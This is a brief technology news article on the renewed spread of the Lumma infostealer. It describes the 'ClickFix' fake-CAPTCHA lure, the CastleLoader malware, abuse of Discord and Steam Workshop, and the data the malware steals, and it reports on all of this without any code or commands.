Home / Technology / Lumma Stealer's Stealthy Return: Back at Scale
Lumma Stealer's Stealthy Return: Back at Scale
12 Feb
Summary
- Lumma infostealer has resurfaced with sophisticated, hard-to-detect attacks.
- Malware uses fake CAPTCHAs to trick users into installing malicious code.
- Law enforcement previously disrupted Lumma, but it has rapidly rebuilt infrastructure.
Lumma Stealer, a potent infostealer, has made a significant comeback despite a major law enforcement operation last year that disrupted its infrastructure. The malware, which first appeared in 2022, is now operating at scale again, infecting a substantial number of Windows computers globally.
The current surge in Lumma infections relies heavily on "ClickFix," a social engineering lure. This method deceives users into running malicious commands by presenting them as fake CAPTCHAs. Victims are instructed to copy text and paste it into their Windows terminal, inadvertently installing loader malware that then deploys Lumma.
A key element of Lumma's resurgence is the use of CastleLoader, a stealthy, in-memory malware that is heavily obfuscated and difficult to detect. This loader shares rebuilt infrastructure with Lumma, indicating coordinated efforts by threat actors. Lumma also exploits trusted platforms like Discord and Steam Workshop for distribution, further lowering user suspicion.
Once installed, Lumma siphons a wide array of sensitive data, including browser credentials, personal documents, financial information, cryptocurrency wallet data, and system metadata. The effectiveness of the "ClickFix" method stems from its exploitation of user trust and familiarity with verification processes, leading victims to manually execute malicious code.
